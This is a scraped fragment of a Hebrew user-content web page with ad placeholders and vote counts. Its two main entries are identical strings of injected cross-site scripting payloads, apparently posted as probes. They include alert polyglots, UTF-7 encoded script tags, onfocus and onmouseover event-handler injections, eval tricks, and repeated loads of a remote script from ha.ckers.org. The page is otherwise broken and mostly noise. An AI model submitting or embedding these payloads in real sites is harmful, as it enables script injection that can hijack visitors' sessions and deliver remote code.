חדש! מומו נותנת לכם לבחור את גוון העיצוב המועדף עליכם:
החדשים
פרסומת
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83)) '';!--"=&{()} 0\"autofocus/onfocus=alert(1)-->"-confirm(3)-" xxs link xxs link alert("XSS")"> +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- " SRC="http://ha.ckers.org/xss.js"> " SRC="http://ha.ckers.org/xss.js"> " '' SRC="http://ha.ckers.org/xss.js"> '" SRC="http://ha.ckers.org/xss.js"> ` SRC="http://ha.ckers.org/xss.js"> '>" SRC="http://ha.ckers.org/xss.js"> document.write(" XSS 0\"autofocus/onfocus=alert(1)-->"-confirm(3)-" veris-->group element[attribute=' [[" onmouseover="alert('RVRSH3LL_XSS');" ] %22;alert%28%27RVRSH3LL_XSS%29// javascript:alert%281%29; alert;pg("XSS") for((i)in(self))eval(i)(1) alert(1)alert(1) alert(1) test
5
12
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83)) '';!--"=&{()} 0\"autofocus/onfocus=alert(1)-->"-confirm(3)-" xxs link xxs link alert("XSS")"> +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- " SRC="http://ha.ckers.org/xss.js"> " SRC="http://ha.ckers.org/xss.js"> " '' SRC="http://ha.ckers.org/xss.js"> '" SRC="http://ha.ckers.org/xss.js"> ` SRC="http://ha.ckers.org/xss.js"> '>" SRC="http://ha.ckers.org/xss.js"> document.write(" XSS 0\"autofocus/onfocus=alert(1)-->"-confirm(3)-" veris-->group element[attribute=' [[" onmouseover="alert('RVRSH3LL_XSS');" ] %22;alert%28%27RVRSH3LL_XSS%29// javascript:alert%281%29; alert;pg("XSS") for((i)in(self))eval(i)(1) alert(1)alert(1) alert(1) test
5
8
איך לדעתך האתר
5
28
פרסומת
פרסומת
פרסומת
פרסומת